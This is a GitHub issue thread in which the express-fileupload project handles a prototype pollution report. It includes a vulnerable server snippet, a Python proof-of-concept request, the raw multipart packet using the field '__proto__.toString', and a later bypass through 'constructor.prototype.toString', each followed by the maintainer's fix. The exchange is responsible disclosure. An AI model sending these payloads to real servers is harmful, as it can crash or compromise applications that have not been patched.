richardgirges / express-fileupload

Simple express file upload middleware that wraps around busboy
MIT License

Prototype Pollution #236

Closed po6ix closed 4 years ago

po6ix commented 4 years ago

This module has a prototype pollution vulnerability, and it can cause a DoS with the parseNested option.

server

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

// parseNested expands dotted field names ("a.b.c") into nested objects
app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
    res.end('express-fileupload poc');
});

app.listen(7777);

exploit

import requests

# the field name is a dotted path, so parseNested walks "__proto__" and assigns "toString" on it
res = requests.post('http://p6.is:7777', files={'__proto__.toString': 'express-fileupload poc'})

raw packet

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 137

----------1566035451
Content-Disposition: form-data; name="__proto__.toString"; filename="filename"

content
----------1566035451--

The full description is here: https://blog.p6.is/Real-World-JS-1/

richardgirges commented 4 years ago

Thanks for reporting this. Fix has been applied and published to NPM: https://github.com/richardgirges/express-fileupload/releases/tag/1.1.8

securityMB commented 4 years ago

@richardgirges The fix can be bypassed. Instead of referencing __proto__.toString, one can reference constructor.prototype.toString.

richardgirges commented 4 years ago

Thanks @securityMB - it has been fixed and a second deprecation notice has been posted on NPM for all prior versions.

ghost commented 4 years ago

https://www.bleepingcomputer.com/news/security/nodejs-module-downloaded-7m-times-lets-hackers-inject-code/ They just announced this in the news today, yet you claim to have fixed it 5 days ago. Love how far behind the news is on this. Thanks for the quick fix of this issue! Someone should contact the news folks.

richardgirges commented 4 years ago

Thanks for the heads up on this @naraphox